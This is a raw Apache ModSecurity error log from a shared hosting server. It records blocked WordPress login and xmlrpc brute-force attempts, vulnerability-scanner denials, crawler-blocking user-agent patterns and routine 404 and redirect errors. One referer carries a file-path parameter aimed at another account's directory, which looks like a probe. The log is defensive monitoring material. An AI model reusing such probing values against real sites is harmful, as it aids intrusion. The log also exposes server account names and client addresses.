[Tue May 26 17:32:49.150113 2026] [security2:error] [pid 894579:tid 894591] [remote 64.188.91.103:52887] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatchFromFile sitelock.txt" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "398"] [id "900247"] [msg "Wordpress Plugin README.txt file access attempt"] [hostname "panda-eco.com"] [uri "/wp-content/plugins/fusion-builder/readme.txt"] [unique_id "ahWL6QEtZWuWWBGzl__TRwABEgs"]
[Tue May 26 17:32:49.295814 2026] [security2:error] [pid 894579:tid 894757] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWL6AEtZWuWWBGzl__TPwAAATk"]
[Tue May 26 17:32:49.433028 2026] [security2:error] [pid 891273:tid 891319] [remote 103.230.156.120:51792] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 120.156.230.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWL6cDEzZ8z3jtDm82pWwAAHy0"]
[Tue May 26 17:32:49.871785 2026] [security2:error] [pid 894579:tid 894692] [remote 79.99.41.110:39584] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.41.99.79.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWL6QEtZWuWWBGzl__TaQABS3A"]
[Tue May 26 17:32:50.561276 2026] [security2:error] [pid 894579:tid 894590] [remote 92.117.185.70:64528] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 70.185.117.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/wp-login.php"] [unique_id "ahWL6gEtZWuWWBGzl__TgQABHAo"]
[Tue May 26 17:32:52.265883 2026] [security2:error] [pid 894579:tid 894787] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWL6wEtZWuWWBGzl__TwgAAAVY"]
[Tue May 26 17:32:54.064737 2026] [security2:error] [pid 894579:tid 894811] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWL7QEtZWuWWBGzl__UJAAAAW4"]
[Tue May 26 17:32:55.665557 2026] [security2:error] [pid 891273:tid 891324] [remote 209.42.20.53:53436] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.20.42.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWL78DEzZ8z3jtDm82prgAAHTI"]
[Tue May 26 17:32:55.957009 2026] [security2:error] [pid 894579:tid 894711] [client 223.235.98.214:18432] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWL7wEtZWuWWBGzl__UfgAAAQs"]
[Tue May 26 17:32:55.957175 2026] [security2:error] [pid 894579:tid 894711] [client 223.235.98.214:18432] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWL7wEtZWuWWBGzl__UfgAAAQs"]
[Tue May 26 17:32:56.898701 2026] [security2:error] [pid 894579:tid 894804] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWL8AEtZWuWWBGzl__UoQAAAWc"]
[Tue May 26 17:32:57.668386 2026] [autoindex:error] [pid 891273:tid 891508] [client 35.253.229.236:58056] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:32:59.250843 2026] [security2:error] [pid 894579:tid 894829] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWL8gEtZWuWWBGzl__VEAAAAYA"]
[Tue May 26 17:32:59.455337 2026] [security2:error] [pid 891273:tid 891336] [remote 74.7.241.58:36208] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWL88DEzZ8z3jtDm82p4AAAND4"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-content/plugins/woocommerce/templates/emails
[Tue May 26 17:32:59.761765 2026] [security2:error] [pid 894579:tid 894816] [client 66.249.66.168:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.preetishah.com"] [uri "/index.php"] [unique_id "ahWL8wEtZWuWWBGzl__VLwAAAXM"]
[Tue May 26 17:33:00.408455 2026] [security2:error] [pid 894579:tid 894746] [client 66.249.66.200:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.preetishah.com"] [uri "/index.php"] [unique_id "ahWL9AEtZWuWWBGzl__VSgAAAS4"]
[Tue May 26 17:33:01.504853 2026] [security2:error] [pid 894579:tid 894724] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWL9QEtZWuWWBGzl__VaQAAARg"]
[Tue May 26 17:33:01.620827 2026] [security2:error] [pid 894579:tid 894617] [remote 103.91.67.202:30936] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWL9QEtZWuWWBGzl__VdQABgSU"]
[Tue May 26 17:33:01.713680 2026] [autoindex:error] [pid 894579:tid 894808] [client 45.148.10.5:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/test/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:33:01.784382 2026] [security2:error] [pid 894579:tid 894816] [client 167.160.78.81:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWL9QEtZWuWWBGzl__ViQAAAXM"], referer: https://www.anujtradingco.com/
[Tue May 26 17:33:01.985686 2026] [security2:error] [pid 894579:tid 894829] [client 114.119.128.19:64093] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "virgence.com"] [uri "/index.php/portfolio_page/voyager-victor-technologies/"] [unique_id "ahWL9QEtZWuWWBGzl__VlAAAAYA"], referer: https://www.bing.com/images/search?q=VICTOR%20TECHNOLOGIES%20INTL%2C%2Bhotery%20product
[Tue May 26 17:33:01.987376 2026] [security2:error] [pid 894579:tid 894790] [client 146.103.101.188:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWL9QEtZWuWWBGzl__VkwAAAVk"], referer: http://www.anujtradingco.com/top-deejay-headphones/?unapproved=1259700&moderation-hash=b82269cbfc117ff10a782a4f8b453b66
[Tue May 26 17:33:02.414924 2026] [security2:error] [pid 894579:tid 894740] [client 146.103.101.188:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWL9gEtZWuWWBGzl__VqwAAASg"], referer: http://anujtradingco.com/top-deejay-headphones/?unapproved=1259700&moderation-hash=b82269cbfc117ff10a782a4f8b453b66
[Tue May 26 17:33:03.408757 2026] [security2:error] [pid 894579:tid 894657] [remote 45.32.67.165:57230] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.67.32.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWL9wEtZWuWWBGzl__V0AABNk0"]
[Tue May 26 17:33:03.974054 2026] [security2:error] [pid 894579:tid 894836] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWL9wEtZWuWWBGzl__V2AAAAYc"]
[Tue May 26 17:33:04.053961 2026] [security2:error] [pid 894579:tid 894669] [remote 193.42.61.12:35428] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWL9wEtZWuWWBGzl__V4wABRFk"]
[Tue May 26 17:33:04.173089 2026] [core:error] [pid 894579:tid 894830] [client 74.7.241.147:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:33:04.173105 2026] [core:error] [pid 894579:tid 894830] [client 74.7.241.147:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:33:04.173225 2026] [security2:error] [pid 894579:tid 894830] [client 74.7.241.147:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "www.subbroker.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWL-AEtZWuWWBGzl__V-AAAAYE"]
[Tue May 26 17:33:04.185235 2026] [security2:error] [pid 891273:tid 891420] [client 74.7.241.147:34002] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "www.subbroker.bloggertarget.com"] [uri "/robots.txt"] [unique_id "ahWL-MDEzZ8z3jtDm82qQwAAETk"]
[Tue May 26 17:33:04.384491 2026] [autoindex:error] [pid 891273:tid 891492] [client 45.148.10.5:0] AH01276: Cannot serve directory /home1/anujtrad/public_html/test/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 17:33:06.059903 2026] [security2:error] [pid 894579:tid 894731] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWL-QEtZWuWWBGzl__WHgAAAR8"]
[Tue May 26 17:33:06.310372 2026] [security2:error] [pid 894579:tid 894828] [client 223.235.98.214:4920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWL-gEtZWuWWBGzl__WKAAAAX8"]
[Tue May 26 17:33:06.310603 2026] [security2:error] [pid 894579:tid 894828] [client 223.235.98.214:4920] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWL-gEtZWuWWBGzl__WKAAAAX8"]
[Tue May 26 17:33:07.851342 2026] [security2:error] [pid 891273:tid 891420] [client 66.249.70.200:47969] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.ucdc.co.in"] [uri "/index.php"] [unique_id "ahWL-8DEzZ8z3jtDm82qfwAAABE"]
[Tue May 26 17:33:08.739966 2026] [security2:error] [pid 891273:tid 891441] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWL_MDEzZ8z3jtDm82qjAAAACY"]
[Tue May 26 17:33:11.013662 2026] [security2:error] [pid 891273:tid 891514] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWL_sDEzZ8z3jtDm82qrgAAAG8"]
[Tue May 26 17:33:12.506321 2026] [security2:error] [pid 894579:tid 894811] [client 167.160.69.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWMAAEtZWuWWBGzl__WdgAAAW4"], referer: https://www.anujtradingco.com/
[Tue May 26 17:33:13.013039 2026] [security2:error] [pid 891273:tid 891441] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMAMDEzZ8z3jtDm82qzQAAACY"]
[Tue May 26 17:33:13.271764 2026] [security2:error] [pid 891273:tid 891428] [client 181.62.52.20:9449] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "ecosol.plus"] [uri "/esplus/usuarios/dashboard.php"] [unique_id "ahWMAMDEzZ8z3jtDm82qzwAAGV8"], referer: https://ecosol.plus/esplus/login.php
[Tue May 26 17:33:13.713195 2026] [security2:error] [pid 891273:tid 891525] [client 167.160.69.208:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWMAcDEzZ8z3jtDm82q1gAAAHo"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1451724&moderation-hash=c10d94684c11aa1f3585d7068d7348eb
[Tue May 26 17:33:14.654006 2026] [security2:error] [pid 894579:tid 894729] [client 146.174.160.147:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMAgEtZWuWWBGzl__WjAAAAR0"]
[Tue May 26 17:33:14.914043 2026] [security2:error] [pid 891273:tid 891432] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMAsDEzZ8z3jtDm82q5QAAAB0"]
[Tue May 26 17:33:16.049220 2026] [security2:error] [pid 894579:tid 894665] [remote 88.198.165.116:36348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 116.165.198.88.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWMAwEtZWuWWBGzl__WnQABbVU"]
[Tue May 26 17:33:16.877514 2026] [security2:error] [pid 894579:tid 894829] [client 223.235.98.214:15069] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMBAEtZWuWWBGzl__WuwAAAYA"]
[Tue May 26 17:33:16.877618 2026] [security2:error] [pid 894579:tid 894829] [client 223.235.98.214:15069] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMBAEtZWuWWBGzl__WuwAAAYA"]
[Tue May 26 17:33:17.846218 2026] [security2:error] [pid 894579:tid 894796] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMBQEtZWuWWBGzl__WwwAAAV8"]
[Tue May 26 17:33:18.763815 2026] [security2:error] [pid 891273:tid 891482] [client 167.160.78.81:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWMBsDEzZ8z3jtDm82rFAAAAE8"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1444288&moderation-hash=a2a21b232750a8a8fba749c7967b8b9c
[Tue May 26 17:33:19.709752 2026] [security2:error] [pid 894579:tid 894761] [client 114.119.159.233:46055] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.gciamd.org.in"] [uri "/regalia/"] [unique_id "ahWMBwEtZWuWWBGzl__W_gAAAT0"], referer: https://www.gciamd.org.in/regalia?lightbox=dataItem-k8fydqkw1
[Tue May 26 17:33:20.162600 2026] [security2:error] [pid 894579:tid 894732] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMBwEtZWuWWBGzl__XAQAAASA"]
[Tue May 26 17:33:20.769692 2026] [core:error] [pid 891273:tid 891491] [client 104.28.222.46:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:33:20.769715 2026] [core:error] [pid 891273:tid 891491] [client 104.28.222.46:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:33:21.669433 2026] [core:error] [pid 891273:tid 891409] [client 104.28.222.46:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:33:21.669449 2026] [core:error] [pid 891273:tid 891409] [client 104.28.222.46:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 17:33:22.297646 2026] [security2:error] [pid 891273:tid 891406] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMCcDEzZ8z3jtDm82rUAAAAAM"]
[Tue May 26 17:33:22.714269 2026] [security2:error] [pid 891273:tid 891508] [client 114.119.132.10:22105] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "samayikprasanga.in"] [uri "/contact.php"] [unique_id "ahWMCsDEzZ8z3jtDm82rXAAAAGk"], referer: https://samayikprasanga.in/about.php
[Tue May 26 17:33:24.970798 2026] [security2:error] [pid 894579:tid 894730] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMDAEtZWuWWBGzl__XzgAAAR4"]
[Tue May 26 17:33:26.304221 2026] [security2:error] [pid 891273:tid 891486] [client 185.191.171.14:22696] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWMDsDEzZ8z3jtDm82rqgAAAFM"]
[Tue May 26 17:33:26.304388 2026] [security2:error] [pid 891273:tid 891486] [client 185.191.171.14:22696] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWMDsDEzZ8z3jtDm82rqgAAAFM"]
[Tue May 26 17:33:26.892540 2026] [security2:error] [pid 894579:tid 894759] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMDgEtZWuWWBGzl__YHgAAATs"]
[Tue May 26 17:33:27.554738 2026] [security2:error] [pid 894579:tid 894727] [client 223.235.98.214:9767] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMDwEtZWuWWBGzl__YSgAAARs"]
[Tue May 26 17:33:27.554863 2026] [security2:error] [pid 894579:tid 894727] [client 223.235.98.214:9767] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWMDwEtZWuWWBGzl__YSgAAARs"]
[Tue May 26 17:33:29.648137 2026] [security2:error] [pid 891273:tid 891473] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMEcDEzZ8z3jtDm82r9wAAAEY"]
[Tue May 26 17:33:32.360053 2026] [security2:error] [pid 894579:tid 894791] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMEwEtZWuWWBGzl__Y6QAAAVo"]
[Tue May 26 17:33:33.654089 2026] [security2:error] [pid 894579:tid 894785] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWMFQEtZWuWWBGzl__ZIQAAAVQ"]
